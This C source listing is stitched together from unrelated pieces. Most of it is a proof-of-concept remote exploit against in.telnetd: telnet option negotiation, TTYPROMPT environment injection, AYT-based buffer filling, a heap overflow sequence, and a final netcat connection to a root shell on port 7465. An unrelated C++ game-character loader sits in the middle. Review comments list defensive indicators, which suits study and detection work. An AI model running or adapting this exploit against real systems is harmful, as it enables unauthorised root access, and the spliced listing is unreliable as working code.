/*
 * Run this client's fixed telnet option negotiation on socket `sd`, then
 * submit a TTYPROMPT environment variable with the value "abcdef".
 *
 * Options refused:  TTYPE, NAWS, XDISPLOC, OLD_ENVIRON.
 * Options accepted: LFLOW, LINEMODE, NEW_ENVIRON, BINARY.
 *
 * will(), wont() and env() are defined elsewhere; from their names they
 * presumably emit IAC WILL / IAC WONT and a NEW-ENVIRON variable -- confirm
 * against their definitions.
 *
 * NOTE(review): TTYPROMPT is a variable that influences the login prompt.
 * A telnet daemon that passes client-supplied environment variables through
 * to login unfiltered is trusting remote input. On the defensive side,
 * servers should restrict the variables they accept, and a TTYPROMPT
 * variable arriving in a telnet session is worth flagging in traffic
 * inspection.
 */
void negotiate(int sd)
{
    /* One row per option, kept in the order the requests must go out. */
    static const struct {
        int agree;   /* non-zero: call will(); zero: call wont() */
        int option;  /* TELOPT_* code */
    } plan[] = {
        { 0, TELOPT_TTYPE },
        { 0, TELOPT_NAWS },
        { 0, TELOPT_XDISPLOC },
        { 1, TELOPT_LFLOW },
        { 1, TELOPT_LINEMODE },
        { 0, TELOPT_OLD_ENVIRON },
        { 1, TELOPT_NEW_ENVIRON },
        { 1, TELOPT_BINARY },
    };
    unsigned int i;

    for (i = 0; i < sizeof(plan) / sizeof(plan[0]); i++) {
        if (plan[i].agree)
            will(sd, plan[i].option);
        else
            wont(sd, plan[i].option);
    }

    /* The environment variable is sent last, after every option request. */
    env(sd, "TTYPROMPT", "abcdef");
}
/// Restore this character's fields from a property bag.
///
/// Every persisted field is read through a typed property reference bound to
/// one of the global property names (g_*). A field is overwritten only when
/// the bag actually contains that property; absent properties leave the
/// current member value untouched.
///
/// NOTE(review): values are copied as stored, with no range or consistency
/// checks (e.g. damage against maxHP). If bags can come from files a user or
/// another party can edit, confirm that validation happens elsewhere.
///
/// @param propBag  bag the property references are linked against
void LegacyCharacter::Load( moPropBagRef propBag )
{
	// --- typed references, one per persisted field -------------------------
	moPropStringRef	name		( g_name	);	// character name
	moPropIntRef	monster		( g_monster	);	// monster or PC (stored as an int, used as bool)
	moPropIntRef	status		( g_status	);	// normal / delayed / readied (Character::Status)
	moPropIntRef	maxHP		( g_maxHP	);	// maximum hit points
	moPropIntRef	damage		( g_damage	);	// damage taken so far
	moPropIntRef	stabilized	( g_stabilized	);	// only meaningful for a dying character
	moPropIntRef	justdropped	( g_justdropped	);	// dropped during the current round
	moPropIntRef	init		( g_init	);	// initiative modifier
	moPropIntRef	spot		( g_spot	);	// spot modifier
	moPropIntRef	listen		( g_listen	);	// listen modifier
	moPropIntRef	will		( g_will	);	// will modifier
	moPropIntRef	position	( g_position	);	// place in the initiative order
	moPropIntRef	initRoll	( g_initRoll	);	// the rolled values themselves
	moPropIntRef	spotRoll	( g_spotRoll	);
	moPropIntRef	listenRoll	( g_listenRoll	);
	moPropIntRef	willRoll	( g_willRoll	);

	// --- bind each reference to the bag, same order as declared ------------
	name.Link( propBag );
	monster.Link( propBag );
	status.Link( propBag );
	maxHP.Link( propBag );
	damage.Link( propBag );
	stabilized.Link( propBag );
	justdropped.Link( propBag );
	init.Link( propBag );
	spot.Link( propBag );
	listen.Link( propBag );
	will.Link( propBag );
	position.Link( propBag );
	initRoll.Link( propBag );
	spotRoll.Link( propBag );
	listenRoll.Link( propBag );
	willRoll.Link( propBag );

	// --- copy across whatever the bag provides -----------------------------
	if( name.HasProp() )
	{
		// NOTE(review): c_str() is taken from a temporary moWCString; this is
		// only safe if f_name copies the characters -- confirm f_name's type.
		f_name = static_cast<moWCString>(name).c_str();
	}
	if( status.HasProp() )
	{
		// NOTE(review): the stored int is cast straight to InternalStatus; a
		// value outside the enum's range is not rejected here.
		f_status = static_cast<InternalStatus>( static_cast<int>(status) );
	}
	if( monster.HasProp() )
	{
		f_monster = monster ? true : false;
	}
	if( maxHP.HasProp() )
	{
		f_maxHP = maxHP;
	}
	if( damage.HasProp() )
	{
		f_damage = damage;
	}
	if( stabilized.HasProp() )
	{
		f_stabilized = stabilized ? true : false;
	}
	if( justdropped.HasProp() )
	{
		f_justdropped = justdropped ? true : false;
	}
	if( init.HasProp() )
	{
		f_init = init;
	}
	if( spot.HasProp() )
	{
		f_spot = spot;
	}
	if( listen.HasProp() )
	{
		f_listen = listen;
	}
	if( will.HasProp() )
	{
		f_will = will;
	}
	if( position.HasProp() )
	{
		f_position = position;
	}
	if( initRoll.HasProp() )
	{
		f_initRoll = initRoll;
	}
	if( spotRoll.HasProp() )
	{
		f_spotRoll = spotRoll;
	}
	if( listenRoll.HasProp() )
	{
		f_listenRoll = listenRoll;
	}
	if( willRoll.HasProp() )
	{
		f_willRoll = willRoll;
	}
}
/*
 * Issue a computed number of do_ayt() calls followed by a computed number of
 * will(with) calls, sized from `count`, then optionally call push_clean().
 *
 * count - total amount to account for; split below into whole multiples of
 *         the global `dalen`, a multiple-of-three part, and a remainder
 * with  - argument passed unchanged to every will() call
 * real  - when exactly 1, push_clean() is called after the loops
 *
 * Declared with an implicit int return type and returns no value.
 *
 * Reads the globals dalen, big and small. do_ayt(), will(), solve() and
 * push_clean() are defined elsewhere; by name do_ayt() presumably sends a
 * telnet "Are You There" request -- confirm against its definition.
 *
 * NOTE(review): for defenders, what is visible here is two back-to-back
 * runs of identical requests with no user data in between. A telnet service
 * has to bound the output it queues in reply to such requests, and long
 * runs of AYT from one client are abnormal enough to alert on.
 */
fill2 (int count, char with, int real)
{
  int l;
  int first, rest, find;

  /* Whole multiples of dalen in count, less a fixed 10. */
  first = (int) (count / dalen) - 10;
  /* Leftover after the dalen multiples, rounded down to a multiple of 3. */
  rest = (int) (((count) % dalen) / 3) * 3;
  /* Whatever of count the two terms above do not account for. */
  find = count - ((first * dalen) + (rest * 3));

  /* solve() is opaque here; big and small are read straight after it and
     never assigned in this function, so it presumably sets them -- confirm. */
  solve (find);
  first += big;
  rest += small;

  for (l = 0; l < first; l++)
    do_ayt ();
  for (l = 0; l < rest; l++)
    will (with);

  if (real == 1)
    {
      push_clean ();
    }
}
/*
 * Entry point of a proof-of-concept client aimed at a telnet daemon (the
 * --pause path lists in.telnetd processes). The status messages it prints
 * describe its own phases: option negotiation, environment setup, a series
 * of "overflows", and finally an attempt to reach a shell it expects to be
 * listening locally.
 *
 * Command line:
 *   --pause        set dosleep; after sock_setup() list in.telnetd processes
 *                  via system() and sleep 8 seconds
 *   --size  N      overwrite the global mipl with atoi(N)
 *   --name  HOST   set dalen to strlen(HOST) instead of the built-in default
 *
 * Declared with an implicit int return type; the only ways out are exit()
 * or a successful execlp().
 *
 * NOTE(review), for defenders reading this listing -- indicators visible in
 * the code itself:
 *   - USER and TERM environment variables both set to "zen-parse";
 *   - WILL NEW-ENVIRON (option 39) sent repeatedly around the bulk traffic;
 *   - a listener on TCP port 7465 on the telnet host afterwards, which the
 *     closing messages describe as a root shell.
 * A host still exposing telnetd should be patched or have the service
 * retired in favour of SSH; an unexpected listener on 7465 warrants
 * incident handling, not just closing the port.
 */
main (int argc, char *argv[])
{
  int br, l, dosleep = 0;
  int percent = 0;
  char spin;
  unsigned char w;

  bzero (oldenv, sizeof (oldenv));
  argv++;
  /* Default dalen is the length of a built-in host name. */
  dalen = strlen ("clarity.local");

  /* Hand-rolled option parsing; unknown arguments are silently skipped and
     --size is taken through atoi() with no validation. */
  while (argv[0])
    {
      if (!strcmp (argv[0], "--pause"))
        dosleep = 1;
      if (!strcmp (argv[0], "--size") && argv[1])
        {
          mipl = atoi (argv[1]);
          argv++;
        }
      if (!strcmp (argv[0], "--name") && argv[1])
        {
          dalen = strlen (argv[1]);
          argv++;
        }
      argv++;
    }
  fprintf (stderr, " o MiPl of %4d o NameLen of %2d\n", mipl, dalen);

  /* Pick the offset table: an alternative table when dalen is a multiple of
     three, otherwise adjust entry 11 of the default one from mipl. */
  if(dalen%3==0)
    {
      offsets=offset3;
    }
  else
    {
      ninbufoffset = mipl % 8192;
      offsets[11] += 32 * (mipl - ninbufoffset) / 8192;
      if (offsets[11] > 255)
        {
          /* The format string has no conversions; mipl and dalen are unused. */
          fprintf (stderr, " ! MiPl too big.", mipl, dalen);
          exit (1);
        }
    }

  /* sock_setup() is defined elsewhere; presumably it opens the connection
     behind dasock -- confirm. */
  sock_setup ();
  if (dosleep)
    {
      /* Fixed command string, no user input reaches the shell. */
      system ("sleep 1;ps aux|grep in.telnetd|grep -v grep");
      sleep (8);
    }

  /* dalen grows by the length of this fixed string; judging by its text it
     is the framing of a server reply -- TODO confirm. */
  dalen += strlen ("\r\n[ : yes]\r\n");

  fprintf (stderr, "o Sending IAC WILL NEW-ENVIRONMENT...\n");
  fflush (stderr);
  doo (5);			/* 5 is the telnet STATUS option */
  will (39);			/* 39 is NEW-ENVIRON */
  fflush (dasock);
  read_sock ();

  fprintf (stderr, "o Setting up environment vars...\n");
  fflush (stderr);
  will (1);			/* 1 is ECHO */
  push_clean ();
  doenv ("USER", "zen-parse");
  doenv ("TERM", "zen-parse");
  will (39);
  fflush (dasock);

  fprintf (stderr, "o Doing overflows...\n");
  fflush (stderr);
  /* offsets is consumed as (offset, value) pairs and the walk stops at a
     pair where both entries are zero. Each round flushes, waits 100 ms and
     drains the socket. */
  for (br = 0; (offsets[br] || offsets[br + 1]); br += 2)
    {
      fill (mipl + ENV + offsets[br], offsets[br + 1]);
      fflush (dasock);
      usleep (100000);
      read_sock ();
    }
  fprintf (stderr, "o Overflows done...\n");
  fflush (stderr);
  push_clean ();

  fprintf (stderr, "o Sending IACs to start login process...\n");
  fflush (stderr);
  wont (24);			/* TTYPE */
  wont (32);			/* TSPEED */
  wont (35);			/* XDISPLOC */
  fprintf (dasock, "%s", tosend);
  will (1);
  push_heap_attack ();
  sleep (1);

  fprintf (stderr, "o Attempting to lauch netcat to localhost rootshell\n");
  /* execlp() replaces this process when it succeeds, so everything below
     runs only if nc could not be started. */
  execlp ("nc", "nc", "-v", "localhost", "7465", 0);
  fprintf (stderr,
	   "o If the exploit worked, there should be an open port on 7465.\n");
  fprintf (stderr, " It is a root shell. You should probably close it.\n");
  fflush (stderr);
  sleep (60);
  exit (0);
}